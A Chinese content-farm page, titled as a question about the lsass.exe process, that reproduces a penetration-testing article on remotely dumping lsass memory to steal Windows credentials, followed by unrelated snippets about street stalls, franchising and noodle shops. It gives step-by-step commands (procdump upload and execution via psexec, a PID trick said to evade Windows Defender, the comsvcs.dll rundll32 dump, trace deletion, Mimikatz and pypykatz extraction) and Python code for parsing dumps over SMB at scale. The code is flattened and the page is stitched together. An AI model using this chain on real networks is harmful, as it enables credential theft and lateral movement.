范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文
国学影视

lsassexe是什么进程(xp出现lsass错误无法开机)

  lsass exe是什么进程(xp出现lsass错误无法开机)
  在企业渗透测试中,横向移动感染和权限提升是测试攻击范围和扩大攻击力的两个必选项。有多种方法可以实现其中一种,但是今天我们将介绍一种远程读取lsass转储内容的新技术,这将极大地减少在一组计算机上提取密码时的延迟和检测。
  lsass.exe是一个系统重要进程,用于微软Windows系统的安全机制。它用于本地安全和登陆策略。如果结束该进程,会出现不可知的错误。注意:lsass.exe也有可能是Windang.worm、irc.ratsou.b、Webus.B、MyDoom.L、Randex.AR、Nimos.worm等病毒创建的,病毒通过软盘、群发邮件和P2P文件共享进行传播。
  CrackMapExec
  CrackMapExec(CME)是一款后渗透利用工具,可帮助自动化大型活动目录(AD)网络安全评估任务。该工具利用AD内置功能/协议达成其功能,并规避大多数终端防护/IDS/IPS解决方案。
  CrackMapExec工具由Byt3bl33d3r开发和维护的,其目的是异步地能够在一组计算机上执行操作。该工具允许你使用域或本地帐户以及密码或LM-NT哈希在远程计算机上进行身份验证。
  CrackMapExec是采用模块化方式开发的,可以创建该工具在登录到计算机时将执行的自己的模块。模块已经很多了,例如枚举不同的信息(DNS,Chrome凭据,已安装的防病毒软件)模块,BloodHound构建器的执行或在"组策略首选项"中查找凭据的模块。BloodHound是一个独立的Javascript Web应用程序,基于Linkurious构建,使用Electron编译,其中Neo4j数据库由PowerShell ingestor提供。
  Mimikatz模块
  特别是有一个模块,它在一段时间内非常有效,那就是Mimikatz模块。CrackMapExec在远程计算机上运行Mimikatz,以从lsass内存或本地安全权限子系统提取凭据。lsass包含所有安全服务提供者或SSP,它们是管理不同类型身份验证的数据包。出于实际原因,用户输入的凭据通常保存在这些SSP中,这样用户就不必在几秒或几分钟后再次输入它们。
  这就是为什么Mimikatz提取位于这些不同ssp中的信息,就是因为试图找到一些身份验证机密,并将它们显示给攻击者。因此,如果一个权限帐户连接到其中一台受感染的主机,则Mimikatz模块允许你快速提取它的凭证,从而利用这个帐户的权限来攻击更多的目标。
  但是今天,大多数杀毒软件已经可以检测到Mimikatz的存在或执行,并阻止它,所以CrackMapExec模块只是挂起,等待来自服务器的响应,但由于进程被杀死而无法获取。
  手动方式:Procdump
  因此,我过去常常使用名为Procdump的工具手动完成此任务。
  Procdump是Sysinternals套件中的一个工具,由Marc Russinovich编写,旨在帮助系统管理员。目前,这个工具集已经被大量的管理员和开发人员采用,所以微软在2006年决定购买它,并且这些可执行文件现在已经由微软签署,因此Windows认为它们是合法的。
  procdump工具就是这些工具中的一种,它的任务是转储正在运行的进程内存。它会附加到进程,读取其内存并将其写入文件。procdump--accepteula-maprocessus_dump.dmp
  如前所述,Mimikatz在lsass内存中寻找凭证。因此,可以将lsass内存转储到主机上,在本地下载其转储,并使用Mimikatz提取凭据。
  Procdump可用于转储lsass,因为它被认为是合法的,因此不会被视为恶意软件。
  例如,使用套件impacket中的smbclient.py将procdump发送到服务器。
  smbclient.pyADSEC.LOCAL/jsnow@DC01.adsec.local#useC$#cdWindows#cdTemp#putprocdump.exe
  上传后,需要执行procdump来创建此lsass转储。
  psexec.pyadsec.local/jsnow@DC01.adsec.local"C:\\Windows\\Temp\\procdump.exe-accepteula-malsassC:\\Windows\\Temp\\lsass.dmp"
  然后,需要将转储文件下载到攻击者的主机上,并删除远程主机上的跟踪记录。
  #getlsass.dmp#delprocdump.exe#dellsass.dmp
  可以使用Mimikatz检索凭证:第一行加载内存转储,第二行检索秘密。
  sekurlsa::minidumplsass.dmpsekurlsa::logonPasswords
  该技术非常实用,因为它不会产生太多噪音,并且仅在目标主机上使用合法的可执行文件。
  限制与改进
  这种方法有不同的局限性,我们将在此处概述它们,并提出改进措施以解决这些问题。
  Linux / Windows
  第一个问题是,在测试期间,无论是用于Web测试还是用于内部测试,我主要使用Linux,而Mimikatz是专门为Windows开发的工具,最好能够在Linux计算机上执行上述攻击链。
  幸运的是,Skelsec的Pypykatz项目可以帮助我们解决此问题。Skelsec在纯python中开发了Mimikatz的部分实现,这意味着跨平台。像Mimikatz一样,这个工具让我们能够提取lsass转储的秘密。
  pypykatzlsaminidumplsass.dmp
  由于有了这个项目,现在可以在Linux计算机上执行所有操作。上一节中介绍的所有步骤均适用,并且将lsass dump下载到攻击者的主机后,pypykatz用于从此转储中提取用户名和密码或NT哈希。
  到目前为止一切顺利,让我们继续。
  Windows Defender
  现在说说由第二个由Windows防御程序引起的限制,尽管从Windows角度来看,procdump是值得信赖的工具,但Windows Defender认为转储lsass是可疑活动。转储过程完成后,Windows Defender会在几秒钟后删除转储。如果我们的连接性很好,并且转储不太大,则可以在将其删除之前先下载它。
  这对我来说太随意了,在查看了procdump文档之后,我意识到也可以为它提供一个进程标识符(PID)。令人惊讶的是,通过为其提供lsass PID,Windows Defender不再抱怨。
  此时,我们只需要使用命令tasklist查找lsass PID。>tasklist/fi"imagenameeqlsass.exe"ImageNamePIDSessionNameSession#MemUsage========================================================================  lsass.exe640Services015,584K
  一旦检索到此PID,就可以将其与procdump一起使用。procdump-accepteula-ma640lsass.dmp
  然后,我们有足够的时间下载转储文件,然后在本地分析它。
  手动方式
  发送远程主机的procdump、执行它并检索转储,这些工作都非常完美,但是这是一个非常非常慢的过程。
  在本文开头,我们讨论了CrackMapExec及其模块性,这就是为什么我编写了一个模块来自动执行此"攻击"的原因。该模块会将procdump上传到目标,执行它,从lsass检索转储,然后针对CrackMapExec参数中指定的每个目标使用pypykatz对其进行分析。
  该模块运行良好,但是需要很长时间才能运行。由于文件太大,有时在下载大型转储文件时甚至会超时。但是,我们需要使该过程更快。
  转储文件大小
  现在,借助新的CrackMapExec模块,我们可以将lsass转储到远程主机上,并在本地和自动在Linux主机上对其进行分析。但是,进程内存转储大于几个字节,甚至几个千字节。对于lsass转储,它们可以是几兆字节,甚至几十兆字节。在我的测试期间,一些转储竟超过了150MB。
  如果要自动化此过程,我们将必须找到解决方案,因为在200台计算机的子网上下载lsass转储将导致下载数十G数据。一方面,这将花费很长时间,尤其是对于其他国家/地区的全球远程计算机而言,另一方面,安全团队可能会检测到异常的网络流量。
  到目前为止,我们已经有了解决问题的工具,但是这次,我们将不得不手动操作。
  我们将继续使用pypykatz从lsass转储中提取凭证,由于我们只希望procdump上传远程主机,因为它是由微软签署的,所以我们不能上传pypykatz。
  考虑到这一点,我们将使用的方法特点如下:为了分析本地转储,pypykatz必须打开文件并以不同的偏移量读取字节。 Pypykats不会读取太多数据,它只需要读取特定偏移量的特定数据量即可。
  为了提高效率,我们的想法是在远程目标上的转储上远程读取这些偏移量和这些地址,并且只下载包含预期信息的少量转储。
  因此,让我们看一下pypykatz的工作原理。到目前为止,我们一直在使用的命令行如下:pypykatzlsaminidumplsass.dmp
  在pypykate中,LSACMDHelper类处理lsa参数。当我们为其提供lsass转储时,将调用run()方法,这段代码可以在以下方法中找到:######Minidumpelifargs.cmd=='minidump':ifargs.directory:  dir_fullpath=os.path.abspath(args.memoryfile)  file_pattern='*.dmp'ifargs.recursive==True:  globdata=os.path.join(dir_fullpath,'**',file_pattern)  else:	  globdata=os.path.join(dir_fullpath,file_pattern)    logging.info('Parsingfolder%s'%dir_fullpath)  forfilenameinglob.glob(globdata,recursive=args.recursive):  logging.info('Parsingfile%s'%filename)  try:  mimi=pypykatz.parse_minidump_file(filename)  results[filename]=mimi  exceptExceptionase:  files_with_error.append(filename)  logging.exception('Errorparsingfile%s'%filename)  ifargs.halt_on_error==True:  raisee  else:  pass
  lsass转储解析是在以下行实现的:mimi=pypykatz.parse_minidump_file(filename)
  该方法在pypykatz.py文件中定义:fromminidump.minidumpfileimportMinidumpFile""""""@staticmethoddefparse_minidump_file(filename):  try:  minidump=MinidumpFile.parse(filename)  reader=minidump.get_reader().get_buffered_reader()  sysinfo=KatzSystemInfo.from_minidump(minidump)  exceptExceptionase:  logger.exception('Minidumpparsingerror!')  raisee  try:  mimi=pypykatz(reader,sysinfo)  mimi.start()  exceptExceptionase:  #logger.info('Credentialsparsingerror!')mimi.log_basic_info()raisee  returnmimi
  据估计,它是minidump包中的MinidumpFile类,用于处理解析。我们需要更深入一点,专注于小型转储。
  在Minidumpfile类中,解析方法描述如下:@staticmethoddefparse(filename):  mf=MinidumpFile()  mf.filename=filename  mf.file_handle=open(filename,'rb')  mf._parse()	returnmf
  这是我们正在寻找的代码,我们尝试分析的lsass转储被打开,然后被解析。解析仅在文件对象上使用read,seek和tell方法。
  除了在远程文件上,我们只需要编写一些代码来实现这些方法即可。为此,我们将使用Impacket。"""  'open'isrewrittentoopenandreadaremotefile  """classopen(object):def__init__(self,fpath,mode):domainName,userName,password,hostName,shareName,filePath=self._parseArg(fpath)  """  ImpacketSMBConnexionisachildclassofimpacketwrittentosimplifythecode  """self.__conn=ImpacketSMBConnexion(hostName,userName,password,domainName)  self.__fpath=filePath  self.__currentOffset=0self.__tid=self.__connectTree(shareName)  self.__fid=self.__conn.openFile(self.__tid,self.__fpath)    """  Parse"filename"toextractremotecredentialsandlsassdumplocation  """def_parseArg(self,arg):pattern=re.compile(r"^(?P[a-zA-Z0-9.-_]+)/(?P[^:]+):(?P[^@]+)@(?P[a-zA-Z0-9.-]+):/(?P[^/]+)(?P/(?:[^/]*/)*[^/]+)$")  matches=pattern.search(arg)  ifmatchesisNone:  raiseException("{}isnotvalid.Expectedformat:domain/username:password@host:/share/path/to/file".format(arg))  returnmatches.groups()    defclose(self):self.__conn.close()    """  Read@sizebytes  """defread(self,size):ifsize==0:  returnb''value=self.__conn.readFile(self.__tid,self.__fid,self.__currentOffset,size)  returnvalue    """  Moveoffsetpointer  """defseek(self,offset,whence=0):ifwhence==0:  self.__currentOffset=offset    """  Returncurrentoffset  """deftell(self):returnself.__currentOffset
  因此,我们有了在网络共享上进行身份验证的新类,并且可以使用上述方法读取远程文件。如果我们告诉minidump使用这个类而不是传统的open方法,那么minidump会毫不犹豫地读取远程内容。
  minidumpadsec.local/jsnow:Winter_is_coming_\!@DC01.adsec.local:/C$/Windows/Temp/lsass.dmp
  同样,由于pypykatz使用的是minidump,所以它可以分析远程转储而不需要完全下载它。
  pypykatzlsaminidumpadsec.local/jsnow:Winter_is_coming_\!@DC01.adsec.local:/C$/Windows/Temp/lsass.dmp
  优化
  现在,我们有了一种远程读取和分析lsass转储的方法,而不必在我们的计算机上下载完整的150MB转储,这是向前迈出的一大步!
  但是,即使我们不必下载所有内容,转储也要花费很长时间,这几乎与下载整个东西一样多。这是由于每个minidump每次要读取几个字节时,都会向远程服务器发出新请求。这是非常低效的,当我们记录一些读调用时,才意识到minidump发出了许多4字节的请求。
  为了克服这个问题,我实现了一个解决方案,即创建一个本地缓冲区,并在请求期间强制读取最少的字节数,以减少开销。如果一个请求需要的字节少于4096,那么我们仍然会请求4096字节,我们将在本地保存这些字节,并且我们只会将第一个字节返回给minidump。
  在接下来对read函数的调用中,如果请求的数据大小在本地缓冲区中,则直接返回本地缓冲区,这要快得多。另一方面,如果数据不在缓冲区中,则将请求一个4096字节的新缓冲区。
  该优化非常有效,因为minidump会执行大量并发读取。实施方法如下:defread(self,size):"""  Returnanemptystringif0bytesarerequested  """ifsize==0:  returnb''  if(self.__buffer_data["offset"]<=self.__currentOffsetself.__currentOffset+size):  """  Ifrequestedbytesareincludedinlocalbufferself.__buffer_data["buffer"],wereturnthesesbytesdirectly  """value=self.__buffer_data["buffer"][self.__currentOffset-self.__buffer_data["offset"]:self.__currentOffset-self.__buffer_data["offset"]+size]  else:  """  Else,werequestthesebytestotheremotehost  """self.__buffer_data["offset"]=self.__currentOffset    """  Iftherequestasksforlessthenself.__buffer_min_sizebytes,wewillstillaskforself.__buffer_min_sizebytesandwewillsavetheminthelocalbufferfornextcalls.  """ifsize<self.__buffer_min_size:  value=self.__conn.readFile(self.__tid,self.__fid,self.__currentOffset,self.__buffer_min_size)  self.__buffer_data["size"]=self.__buffer_min_size  self.__total_read+=self.__buffer_min_size    else:  value=self.__conn.read(self.__tid,self.__fid,self.__currentOffset,size)  self.__buffer_data["size"]=size  self.__total_read+=size    self.__buffer_data["buffer"]=value    self.__currentOffset+=size  """  Returnwhatwasasked,nomore.  """returnvalue[:size]
  这种优化大大节省了时间,下面是在我的计算机上做的一个基准测试:$pythonno_opti.pyFunction=minidump,Time=39.831733942$pythonopti.pyFunction=minidump,Time=0.897719860077
  如果不进行此优化,则脚本将花费大约40秒钟来运行,而如果进行了优化,则将花费不到一秒钟的时间。这意味着,在小于150 MB的远程lsass转储中,提取身份验证秘密的时间不到一秒钟!
  从方程式中删除Procdump
  我们当前的技术是依靠Procdump转储lsass内存,但是,尽管它是由Microsoft签署的,但我发现不使用它更干净,而改用Microsoft内置工具。
  C:\Windows\System32中有一个名为comsvcs.dll的DLL,它在进程崩溃时转储进程内存。该DLL包含一个名为MiniDumpW的函数,该函数已编写,因此可以使用rundll32.exe进行调用。
  前两个参数未使用,但第三个参数分为三部分。第一部分是将要转储的进程ID,第二部分是转储文件位置,第三部分是单词full,没有其他选择。
  一旦解析了这3个参数,基本上该DLL将创建转储文件,并将指定的进程转储到该转储文件中。
  由于有了此功能,我们可以使用comsvcs.dll来转储lsass进程,而不用上传procdump并执行它。rundll32.exeC:\Windows\System32\comsvcs.dllMiniDump"lsass.dmpfull"
  我们只需要记住,该技术只能作为SYSTEM执行。
  CrackMapExec模块
  使用此新工具,我修改了CrackMapExec模块,以便它从lsass转储中远程提取密码。
  由于pypykatz和minidump仅在python3.6以前的版本中运行,而CrackMapExec尚不兼容python3,因此我目前无法发出拉取请求,也无法将pypykatz导入到我的模块中。目前,对pypykatz的调用是通过调用我的工具的新进程完成的。
  mpgn正在使用适用于python 3的CrackMapexec。
  新开发的工具
  本文有两个我写的工具,你可以使用这个技巧:
  我的Github或Pypi上都有lsassy,此工具使用DLL技术或Procdump技术使用本文中讨论的所有研究来远程转储lsass。
  CrackMapExec模块允许你通过在远程主机上执行lsass转储,并使用lsassy提取登录用户的凭据来自动化整个过程。通过使用Bloodhound收集的数据,还可以检测具有攻击路径的帐户成为域管理员。

夜市摆摊卖什么好(晚上兼职摆地摊卖什么好)地摊现在成为普通百姓的热点,并且国家也在大力倡导摆摊,所以很多人创业就从报摊开始,那哪些商品适合现在摆摊的呢?下面来我们就来给大家讲解一下这方面的内容。1。耳饰耳饰其实不分季节,主摆夜市地摊卖啥最好(夜市地摊小吃什么最火)世界各地美食文化博大精深,营养物质各不相同,品味更多美食,享受更多健康。这在生活当中美食除了大饭店里面的山珍海味之外,这边上的小吃也都是非常有特色的,而且对于很多年轻人来说,在下班互联网公司靠什么赚钱(网络行业做什么挣钱)现在网络连接着我们每个人的生活。有太多的人依靠网络来赚了很多钱。而又因为网络的便捷和实用,那么很多人也想要在网络上做一个能够在工作之外的副业。但是现在在互联网上其实赚钱是不容易的。机械行业做什么最赚钱(家庭工厂创业的好项目)现在越来越多的朋友,因为一些原因不能出门上班,所以想要找一个可以在家里操作就可以赚钱的项目,那么大家选择一些家庭加工项目,一起去了解一下有哪些可以在家加工的项目?1手工绣品店近年来网络怎么赚钱(适合穷人的18个创业项目投资小)我最讨厌的人就是一心想要搞钱但既浮躁又没有执行力的,他们看过大量有关赚钱的项目,但他们总赚不到钱,关于赚钱的这个问题。未来能赚到钱的一定不是你现在知道的事情。草根想要赚钱白手起家就没钱怎么创业网络小生意搞起来!(现在做什么小生意可以赚钱)想要去打工赚钱,却因为学历技术等门槛找不到高薪工作想要去创业赚钱,却因为手里没有资金最后放弃了其实,在我们的日常生活中,就有着一些不需要学历门槛,也不需要太多资金支撑的赚钱小生意,目前适合年轻人做的最好的创业项目大全好多年轻人都不甘于给别人打工,想要自己去搞自己的事情,那这个时候就可能要创业。想要打听事业他肯定是需要选准项目才行,可是现在项目非常的多,好多年轻人都不知道自己适合做什么项目会比较青年人创业(适合年轻人的创业好项目)青年人创业(适合年轻人的创业好项目)原创新民网20210514144336新民晚报记者周馨摄孙云文闯上海,创巅峰。上海青年创新创业的气魄不一般。明天,第二届上海创新创业青年50人论网上创业做什么好(适合年轻人创业项目投资小)我们每天上班下班的工作,做着重重复复的事情,刚刚上班做一段时间倒没有什么,但是一但做久了之后,那么就可能觉得有点枯燥,我想每一个人应该都有这样子的经历,不想上班,想自动去创业,都有年轻人创业小众项目(创业小项目推荐)人类的2021有多难,疫情,地震,洪水很多行业都受到了不小的冲击。待业工资不够花成为了年轻人的一大难题。那有没有投资少,回报高的创业项目呢。下面是小编总结的几个投资不高,甚至都不需现在年轻人创业项目找投资(创业小项目推荐)现在越来越多的年轻人想要创业,好不容易攒够了钱,但是又不知道什么项目赚钱,因为不想让自己的积蓄毁于一旦,所以在选择项目的时候,很是慎重,今天带来了年轻人十大创业项目,希望大家可以从
女装品牌折扣加盟(成都品牌折扣女装店免费加盟)女装品牌折扣加盟(成都品牌折扣女装店免费加盟)开过品牌折扣女装店的小伙伴们都知道,品牌折扣女装加盟的好处有很多,因为随着社会的变化,文化的发展,人们对于穿着打扮要求越来越高,服装款足球起源哪个国家(什么是阿根廷最火爆的德比)河床在皇马主场伯纳乌球场捧得队史第四座南美解放者杯。图片来源Osports全体育图片社中新网客户端北京12月10日电(王思硕)与南美洲隔海相望的西班牙马德里,伯纳乌满场球迷共同注视哪里小吃最多(全国小吃排行榜最火爆的)近日,柳州螺蛳粉登上热搜,实现了从传统特色产品蝶变为网红食品的传奇。中国是一个美食的国度,全国知名地方小吃成千上万,全中国最火的小吃究竟是什么?这个问题有点危险,因为对味道的喜好是costco超市上海(好事多超市加盟)costco超市上海(好事多超市加盟)家还记得前两年Costco在上海开业时的火爆场面吗?上海是中国经济最发达的城市之一,人民群众的购买力过于旺盛,由于人流量车流量太大,Costc如何加盟超市(怎么加盟超市连锁店)便利店加盟是目前加盟行业的热门板块。许多知名品牌正在大力招聘加盟商,许多新品牌也在迅速崛起。在竞争日益激烈的背景下,如何以最低的成本获得最多的客户资源是一个重要问题。传统的招商方式怎么加盟快递(怎么加盟快递超市)有的小伙伴们经常咨询我如何开个快递驿站,针对开站流程我们先梳理下步骤选址快递入驻驿站申请资质注册首先是选址,选址的要素有三条,1人口密度高,2必经之路。人口密度高好理解,这里要强调康师傅私房牛肉面馆(康师傅推出实体牛肉面馆)康师傅私房牛肉面馆(康师傅推出实体牛肉面馆)说起康师傅,大家想到的一定是康师傅泡面,一直以来销量都是遥遥领先,口味比较多,大家吃得也放心,价格一直也没有涨,所以康师傅方便面在大家心什么面馆(面馆的利润有多少)有个闺蜜从小一起长大的,后来在打工的时候远嫁他乡,好多年没见,只听说他老公以前是建筑工地的小包工头,应该很有钱,后来在承包一个大型工地的时候负债了,原因是工地上出事了,赔了很多钱。面馆怎么样(开面馆风险有多大)没有人知道哪一天他们会失业。即使是恒大这样的大公司,也能在时间中倒下,我们的企业家,很多创业者信仰的马云,也慢慢地淡出公众的视野,多少个首富在历史中销声匿迹。中国经济发展是10年一开面馆多少钱(开面馆可以带着卖啥)案例背景这家面馆在广东肇庆,是一位85后小伙开的小伙姓黄,这里我称呼他为黄老板。他这间面馆很平常和别的店没什么两样,只有一个特价活动,就是两元吃面没有任何的限制。只要是顾客进店做到肉夹馍怎么做(肉夹馍的家常做法)肉夹馍怎么做(肉夹馍的家常做法)最近馋肉夹馍了,前两天去了一家陕西风味的饭馆,点了两个肉夹馍,馍挺好吃的,就是肉有点儿少。家附近的一个主食店里的肉夹馍,肉放得挺多,但是饼又不太好吃